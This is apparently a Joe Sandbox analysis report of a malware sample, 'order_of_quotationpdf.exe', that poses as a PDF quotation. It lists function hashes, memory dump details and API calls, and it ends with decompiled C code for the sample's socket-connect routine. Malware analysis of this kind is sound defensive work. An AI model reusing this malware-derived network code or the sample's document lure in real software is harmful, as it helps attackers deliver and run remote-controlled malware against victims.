String ID:
API String ID:
Opcode ID: e8cca8fbe5d0f70dc56a46106adcfe31cf86a0f03d3c688e0248d984dd255ddd
Instruction ID: d8f56c290697c5d6d6d7d643280dd1e2d4c51f279660f2b50a62779fc87c4d81
Opcode Fuzzy Hash: e8cca8fbe5d0f70dc56a46106adcfe31cf86a0f03d3c688e0248d984dd255ddd
Instruction Fuzzy Hash: 5A110A5164E3D02EC313573C28749E93FA58E6716970A44E7E095CB2A3D9084D1993AA

Uniqueness

Uniqueness Score: -1.00%

Function 078C9B98 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d89308dde53632a3d0d66b1b22a1b649824610579765edb3b4848286bb7acd4
Instruction ID: f3b889e193ea795fbc03ed9d5cb6f327af2d4d9abe3d173a0015935ff019ed71
Opcode Fuzzy Hash: 1d89308dde53632a3d0d66b1b22a1b649824610579765edb3b4848286bb7acd4
Instruction Fuzzy Hash: 3C11E371304720AFC7249B5AE80492BBBFDEBD5720B0584AFE649D7611DA74F8008BE1

Uniqueness

Uniqueness Score: -1.00%

Function 078C5756 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85c330dede6388f7bdbf0fb215a45c35ac3d33f71f6c43f565818e229a0d827
Instruction ID: 0a664b1875ba1b9877abc9bac191a6b73f1601dc00edecd94ee6500734fd138c
Opcode Fuzzy Hash: e85c330dede6388f7bdbf0fb215a45c35ac3d33f71f6c43f565818e229a0d827
Instruction Fuzzy Hash: 54213EB4A0010AEFDF15DF55D8419AE7BB6FF58344F248019E805D7660DB34EAA1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078C4BB0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac7e2401b15fb70ed752f7982545ed977d74215a88bfe5a26c2d3250bb18471
Instruction ID: c53cd2cefc0293acff076f0527df5171a95dd6032d0cb6b2188d743b0804bf5b
Opcode Fuzzy Hash: 4ac7e2401b15fb70ed752f7982545ed977d74215a88bfe5a26c2d3250bb18471
Instruction Fuzzy Hash: 2211DA703186D48BE7289F54D03836A7EAEEB95718F10801ED01BC7A66CBBDE985C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 078C3D48 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e6f7ce1bad655bc8c3b6bb69028022b37c0f031ce1999b8a5af4cd6d1a16e6
Instruction ID: 263ea802b90738622011c860f7b821c46788332747cd97cf326f4ca5dab2aa9b
Opcode Fuzzy Hash: c2e6f7ce1bad655bc8c3b6bb69028022b37c0f031ce1999b8a5af4cd6d1a16e6
Instruction Fuzzy Hash: 2111E5B07006162BC710EE6EE48891E7797FBE5624300C52AE500CB705EF74FC168BD1

Uniqueness

Uniqueness Score: -1.00%

Function 078CC4D8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d75b7d34bdda34b03f60980a24dad9f2730ef51264ffaa4f1e0b0f0619eac67f
Instruction ID: 826cfded00172646fffe8eea3372d5392443e5fb67c1360cb0141147479928b6
Opcode Fuzzy Hash: d75b7d34bdda34b03f60980a24dad9f2730ef51264ffaa4f1e0b0f0619eac67f
Instruction Fuzzy Hash: BD0104767042049FE7249F69F00866EBBE6EBC1331F14406ED20EC7B81CB39A805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 078CA04D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c612f739883a437614266cda11d61e64f955cf6e9ef05c25c9bdb76a5e7650
Instruction ID: 464ad90caefd04c2d14064789081d5f793a23f4d0c23c0a8145f3d165ef42c3b
Opcode Fuzzy Hash: 10c612f739883a437614266cda11d61e64f955cf6e9ef05c25c9bdb76a5e7650
Instruction Fuzzy Hash: F7118E35E001188BDB68DBA4D8546ADBBBAFF88315F148169E406E3351DF389C91CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A1D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.400698249.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a1d000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
Instruction ID: c921672c292be3d0826f295aad28bcf6243f45dafd253fb6f103c6db16d7b50b
Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
Instruction Fuzzy Hash: A311D376904280DFDB12CF58D5C4B56BF72FB84324F24C6A9D9450B61BC33AD456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 078CFD98 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4246427d81164c4d4b21ae7e29a07e78dee97f8737293d0e3df05deae1c722e9
Instruction ID: 97b2f6fb4f7309fa3bc851125880603132d5717a1ccda9ccc3bfa753f27ee734
Opcode Fuzzy Hash: 4246427d81164c4d4b21ae7e29a07e78dee97f8737293d0e3df05deae1c722e9
Instruction Fuzzy Hash: B801B5F392520EDBE764DF7994097BA3BBAAF25249F10047ED706C1449DA39C503CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 078C04D8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0b6e3859e7ad59286ed1576c945ffc05435c5629ef5d7c316ce6c1cd202eed
Instruction ID: 26ec59ce12818fa5ad3f03da316c1bdd54812b9bbab195f51dee615cf0fd5731
Opcode Fuzzy Hash: 9f0b6e3859e7ad59286ed1576c945ffc05435c5629ef5d7c316ce6c1cd202eed
Instruction Fuzzy Hash: 9101A477300116C7DB1099BABC006BAB399EFD46A5F18847AEB0DDB641E935D842C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01A1D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.400698249.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a1d000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0fb5ad4ac77cfde12cf214bb320637374faadbb656dd36fb61b0dbd9e2baed2
Instruction ID: 821c183fe413c0b54e0c80a7044b4ea337937a2d5742dc7efb23f92051e03376
Opcode Fuzzy Hash: e0fb5ad4ac77cfde12cf214bb320637374faadbb656dd36fb61b0dbd9e2baed2
Instruction Fuzzy Hash: EA01A7714083C49AE7114B69DD88766BFD8EF45778F08C05AFD455A24AC37C9844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 078C8F5F Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2419c4a4edaa8a7f12827c2a1ed25309aba23d6a8c5b33c737aac19bbb14aa3d
Instruction ID: ec4a024927e4d16fb17bfa5e76f72c1324e3d3d0ce0fe2e2f65e8c24871ebff2
Opcode Fuzzy Hash: 2419c4a4edaa8a7f12827c2a1ed25309aba23d6a8c5b33c737aac19bbb14aa3d
Instruction Fuzzy Hash: AB010475A02308DFCB11DFA4D945AADBF76FF91300F1040AAE405AB260DB356E59CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A1D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.400698249.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a1d000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d36ecd3e422897b068a52d5f8418393ceef8271c3f69ceff4bf672ea3dd5755
Instruction ID: f39231e7d980315dd98302ac61bd5893121de82f6d172ad9bea313ecdd2c8008
Opcode Fuzzy Hash: 2d36ecd3e422897b068a52d5f8418393ceef8271c3f69ceff4bf672ea3dd5755
Instruction Fuzzy Hash: 72F06271404784AEE7118B1ADCC8B62FF9CEB41774F18C55AED485B686C3789844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 078CB902 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 899f123d00c38120b4080bfb698b25ceb0b18edd4bb101b754444959a8273d88
Instruction ID: 7e12ceb5893171c54dbfb5b71fcece141eac2c59b4c3ab253c08b086702f8dcf
Opcode Fuzzy Hash: 899f123d00c38120b4080bfb698b25ceb0b18edd4bb101b754444959a8273d88
Instruction Fuzzy Hash: 740124B0900209DFCB50DFA8C84199ABBB1FF48320B20C92AD459A7200E335AA06CF80

Uniqueness

Uniqueness Score: -1.00%

Function 078CFEE2 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d34cab53a25c7a8ff294e7eb27a17a549ff8ff1dfd500d9037284114e0bf43d
Instruction ID: 3aa53630ef8be3064d6cfe0c8912b297aec10759f051569a6cbf43740dbcf1a1
Opcode Fuzzy Hash: 5d34cab53a25c7a8ff294e7eb27a17a549ff8ff1dfd500d9037284114e0bf43d
Instruction Fuzzy Hash: 79F0BEB2F60007CBEB04B6F494102BD76969BD7208F00046DAA82EB281EE38C9428356

Uniqueness

Uniqueness Score: -1.00%

Function 078CB908 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c05ae39f81fb5ab2e2fa0b37872c00dc3c5d2bf9130c7c64a6ccfb8229686a
Instruction ID: 694197e55f586c2b642d363b073d073fd1ed084b95263893eb0a3b4f7fb4856d
Opcode Fuzzy Hash: f2c05ae39f81fb5ab2e2fa0b37872c00dc3c5d2bf9130c7c64a6ccfb8229686a
Instruction Fuzzy Hash: E50119B0D00609DFCB54DFA4C84199EBBF1FF49320F10C969D559A7200E335AA01CF80

Uniqueness

Uniqueness Score: -1.00%

Function 078C8CE8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f07db1388b987f5fb8abf21d7020508f127dd4e36a7050d6d5e3ddb00ba0f5
Instruction ID: fab368270ad7de65a9fd1bee0e3a80f2170a39ebfdde484ba407d26249085bcb
Opcode Fuzzy Hash: c1f07db1388b987f5fb8abf21d7020508f127dd4e36a7050d6d5e3ddb00ba0f5
Instruction Fuzzy Hash: 90D0A922300124330628219F388482FAACEEBCE9B1390007EF20DC3345CD258C0683FA

Uniqueness

Uniqueness Score: -1.00%

Function 078CFC77 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a52cd897b520683f52818eefe9694d84a3f46e23074d7eeebe85d65b0a3940
Instruction ID: 5bc974cef399ccbf87a0d2a3c7c3e9ee17ee0f8563f5820101407c7e2bad49e5
Opcode Fuzzy Hash: 04a52cd897b520683f52818eefe9694d84a3f46e23074d7eeebe85d65b0a3940
Instruction Fuzzy Hash: 43E0C2321956428FC3004E64D8019E03BEAAF5151575980E6F204CBA33C228DE95C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 078CFC48 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750f70b45e59d13ee1c8f43fe34eb6d615f7781e1b6444b7ecd82622aba0e5b0
Instruction ID: beffbc9e41c84de6837d5757a955a265f4fcaf02d6658be20ba554df038b35fc
Opcode Fuzzy Hash: 750f70b45e59d13ee1c8f43fe34eb6d615f7781e1b6444b7ecd82622aba0e5b0
Instruction Fuzzy Hash: FFD0C23521C2500FC701ABA8F8A08D53FAD9F46618B4100EAF5418B762C881DC0083E5

Uniqueness

Uniqueness Score: -1.00%

Function 078C995B Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e7e0d6e7c4e17e85e0de640eccb6138dd250acec59df002d66fbac6b5108e3
Instruction ID: 56ea96d3d46b6eb3e3a21242609198123740b57c0f2885bc70cb99f4187d775b
Opcode Fuzzy Hash: 29e7e0d6e7c4e17e85e0de640eccb6138dd250acec59df002d66fbac6b5108e3
Instruction Fuzzy Hash: 7ED0A9B63692608FE6098638B898C443B74DA8612A30914DBF08DCB2B3C122CC0ACB50

Uniqueness

Uniqueness Score: -1.00%

Function 078CFC58 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0613673b8e936f5e2df10c034b1ec312e7099565bfe19f337845d5880899ec
Instruction ID: 1aa1b686f2619835ac5015ef6b959a8ac8f9b4972bff0f122703279b27b25032
Opcode Fuzzy Hash: 5b0613673b8e936f5e2df10c034b1ec312e7099565bfe19f337845d5880899ec
Instruction Fuzzy Hash: 85C012313201244BC704969DE48499977DDEF49B18B4100A6E505CB761C992EC0047D5

Uniqueness

Uniqueness Score: -1.00%

Function 078CFC88 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffef0e784d0c61992874f3287e4f58744667794a28d3db6b74015b5ed134224
Instruction ID: 24dfa38904364564497f6663942bf9d590708641cc09db1afa7099ca02b41f40
Opcode Fuzzy Hash: 0ffef0e784d0c61992874f3287e4f58744667794a28d3db6b74015b5ed134224
Instruction Fuzzy Hash: DED01272260916CFD7048E25C845A7433EAAF60A1ABA940F4E208CB932C235ED91D690

Uniqueness

Uniqueness Score: -1.00%

Function 078C9040 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.406212714.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78c0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c906958fc6c1bcdaabf04f7094a08ad253da9630f37d77ea2991eb28bacec2f
Instruction ID: 5a251278af5c3032baa3c78c92fa834753c8e1c1043b00bfbcefba4321c7e0bf
Opcode Fuzzy Hash: 2c906958fc6c1bcdaabf04f7094a08ad253da9630f37d77ea2991eb28bacec2f
Instruction Fuzzy Hash: 8DC08CB140D3C47FCF23CBA0D988B8B7F615F92701F16849BF98889043E2700520DB66

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01AF1C48 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c68f458e84641b252261ef6f2e32905d89856bea3893cda06b458f2a4c3e486
Instruction ID: 9deb4657114bf1e9c6646ad3a302f8c1d019019d34421ce03b77f5c1e239b1bf
Opcode Fuzzy Hash: 4c68f458e84641b252261ef6f2e32905d89856bea3893cda06b458f2a4c3e486
Instruction Fuzzy Hash: 3CE16D71E002198FDB14CFA9C881BADBBF2BF84304F19C5AAE159AB245D734AD85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01AF25F8 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d035b34d36fced546aa5b44bae41727fe71e87a2e41e3d5844f12b60116c4cd8
Instruction ID: 01f208c95102656c70c932d1668202b926918545100d7447f7359f61dd95a9b0
Opcode Fuzzy Hash: d035b34d36fced546aa5b44bae41727fe71e87a2e41e3d5844f12b60116c4cd8
Instruction Fuzzy Hash: 11818C32F101168FD754DBA9C894B6EB7A3FFC8720F1A846AE5069B355DE34EC018B90

Uniqueness

Uniqueness Score: -1.00%

Function 01AF1D3E Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb85fd865f1ad1af1a01dc1ad9c61c6d97154cd67c7ffad40facea386b9587c
Instruction ID: ac46ee186c54155827f82f300e49d6adc4d003556d7fe2a60a859305d2d251cb
Opcode Fuzzy Hash: eeb85fd865f1ad1af1a01dc1ad9c61c6d97154cd67c7ffad40facea386b9587c
Instruction Fuzzy Hash: AE914C71E006198BDB15CFA9C890BADFBB3BF84304F29C5AAE145AB245D734AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01AF26AA Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.401074873.0000000001AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1af0000_order_of_quotationpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8fa6c32d0a3b8106b5798cf1ec0140cdcf699c4a7bc81fd294a408ef682406d
Instruction ID: fa17027bb13bbf669f9f880e54f598b9172b8fffb1b132c4d869fbc26715966a
Opcode Fuzzy Hash: d8fa6c32d0a3b8106b5798cf1ec0140cdcf699c4a7bc81fd294a408ef682406d
Instruction Fuzzy Hash: C4613B32F201269BD714DBA9CC84B5EB7E3BFC8720F1AC169E405AB755DA34EC018B80

Uniqueness

Uniqueness Score: -1.00%

Function 078F2BA0 Relevance: 10.6, APIs: 7, Instructions: 146COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 078F2C0C
RtlDecodePointer.NTDLL ref: 078F2C4B
RtlEncodePointer.NTDLL(00000000), ref: 078F2CB2
RtlDecodePointer.NTDLL(00000000), ref: 078F2CEE
RtlEncodePointer.NTDLL(00000000), ref: 078F2D28
RtlDecodePointer.NTDLL ref: 078F2D68
RtlDecodePointer.NTDLL ref: 078F2DA6

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: Pointer$Decode$Encode
String ID:
API String ID: 1638560559-0
Opcode ID: 6adbdfdd6427976d3f6b241f3cdb412f4a3794f2bc03f45c448efc681ef09bd5
Instruction ID: 905bf92c18c63d2cbf3d63fc42ded716f7bd4ec45c5878afd9bbca43398002b0
Opcode Fuzzy Hash: 6adbdfdd6427976d3f6b241f3cdb412f4a3794f2bc03f45c448efc681ef09bd5
Instruction Fuzzy Hash: B6615CF080036A8FDB61DFA9C44C79EBFF4BB28319F14850AD695A6650C37C5188CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 078F2BB0 Relevance: 10.6, APIs: 7, Instructions: 146COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 078F2C0C
RtlDecodePointer.NTDLL ref: 078F2C4B
RtlEncodePointer.NTDLL(00000000), ref: 078F2CB2
RtlDecodePointer.NTDLL(00000000), ref: 078F2CEE
RtlEncodePointer.NTDLL(00000000), ref: 078F2D28
RtlDecodePointer.NTDLL ref: 078F2D68
RtlDecodePointer.NTDLL ref: 078F2DA6

Memory Dump Source

Source File: 00000000.00000002.406353295.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_order_of_quotationpdf.jbxd

Similarity

API ID: Pointer$Decode$Encode
String ID:
API String ID: 1638560559-0
Opcode ID: af21febb3ae71a3b30fa4e4403214328216ec6f45aad4b947266c017bd9fe015
Instruction ID: b8edfed741811d20707cdb0552f9288e837b9ccee3e27b125812ae5681559b9f
Opcode Fuzzy Hash: af21febb3ae71a3b30fa4e4403214328216ec6f45aad4b947266c017bd9fe015
Instruction Fuzzy Hash: C8612AB180076ACFDB61DFAAC54C39EBBF4BB28319F14850AD695B6650C3785188CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: order_of_quotationpdf.exePID: 2956, Parent PID: 6752COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 0040AC93 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0040AC93(intOrPtr __ecx, char _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct HINSTANCE__* _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				_Unknown_base(*)()* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				void _v104;
				intOrPtr _t82;
				signed int _t84;
				short _t88;
				intOrPtr _t93;
				signed int _t110;

				_v8 = __ecx;
				_v12 = _v12 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				E00406830(_v8,  &_a4); // executed
				 *((intOrPtr*)(_v8 + 4)) = _a8;
				_v48 = _v48 & 0x00000000;
				E0041F33D(_v8 + 0x1d8);
				_t110 = 8;
				memset( &_v104, 0, _t110 << 2);
				_v100 = _v100 & 0x00000000;
				_v96 = 1;
				_v92 = 6;
				_t82 = E00406B4A( &_a4);
				__imp__getaddrinfo(_t82, 0,  &_v104,  &_v12);
				_v16 = _t82;
				if(_v16 == 0) {
					_t84 =  *(_v12 + 0x18);
					_v28 = _t84;
					__imp__#23(2, 1, 0); // executed
					 *(_v8 + 0xc) = _t84;
					if( *(_v8 + 0xc) != 0xffffffff) {
						_v60 = 0x1770;
						_v72 = 1;
						_v68 = 0x61a8;
						_v64 = 0x4e20;
						_t45 = _v28 + 4; // 0x2ae8d84d
						 *((intOrPtr*)(_v8 + 0x1cc)) =  *_t45;
						_t88 = 2;
						 *((short*)(_v8 + 0x1c8)) = _t88;
						__imp__#9(_a8);
						 *((short*)(_v8 + 0x1ca)) = _t88;
						__imp__freeaddrinfo(_v12);
						_v32 = LoadLibraryA("Ws2_32.dll");
						_v52 = GetProcAddress(_v32, "connect");
						_t93 = _v8;
						__imp__WSAConnect( *((intOrPtr*)(_t93 + 0xc)), _v8 + 0x1c8, 0x10, 0, 0, 0, 0); // executed
						if(_t93 != 0xffffffff) {
							 *((intOrPtr*)(_v8 + 8)) = 1;
							_v60 = 0x3c;
							E0041F329(_v8 + 0x1d8);
							_v40 = 1;
							E00406B06(); // executed
							return _v40;
						}
						 *(_v8 + 0xc) =  *(_v8 + 0xc) | 0xffffffff;
						_v36 = _v36 & 0x00000000;
						E00406B06();
						return _v36;
					}
					_v24 = _v24 & 0x00000000;
					E00406B06();
					return _v24;
				}
				_v20 = _v20 & 0x00000000;
				E00406B06();
				return _v20;
			}

0x0040ac9a
0x0040ac9d
0x0040aca1
0x0040acac
0x0040acb7
0x0040acba
0x0040acc7
0x0040acce
0x0040acd4
0x0040acd6
0x0040acda
0x0040ace1
0x0040acf5
0x0040acfb
0x0040ad01
0x0040ad08
0x0040ad21
0x0040ad24
0x0040ad2d
0x0040ad36
0x0040ad40
0x0040ad56
0x0040ad5d
0x0040ad64
0x0040ad6b
0x0040ad75
0x0040ad7b
0x0040ad83
0x0040ad87
0x0040ad91
0x0040ad9a
0x0040ada4
0x0040adb5
0x0040adc6
0x0040addc
0x0040ade2
0x0040adeb
0x0040ae08
0x0040ae0f
0x0040ae1f
0x0040ae24
0x0040ae2e
0x00000000
0x0040ae33
0x0040adf0
0x0040adf4
0x0040adfb
0x00000000
0x0040ae00
0x0040ad42
0x0040ad49
0x00000000
0x0040ad4e
0x0040ad0a
0x0040ad11
0x00000000

APIs

Part of subcall function 00406830: lstrcatA.KERNEL32(n@,00000000,00406EEF,00000000,?,?,?,?,0040975B,?,?,?,?,?), ref: 00406885

Part of subcall function 0041F33D: WaitForSingleObject.KERNEL32(00000000,000000FF,0040ACCC,00000000), ref: 0041F34D

getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 0040ACFB
socket.WS2_32(00000002,00000001,00000000), ref: 0040AD2D

Strings

<, xrefs: 0040AE0F
connect, xrefs: 0040ADB8
N, xrefs: 0040AD6B
Ws2_32.dll, xrefs: 0040ADAA
pREw, xrefs: 0040ACFB

Memory Dump Source

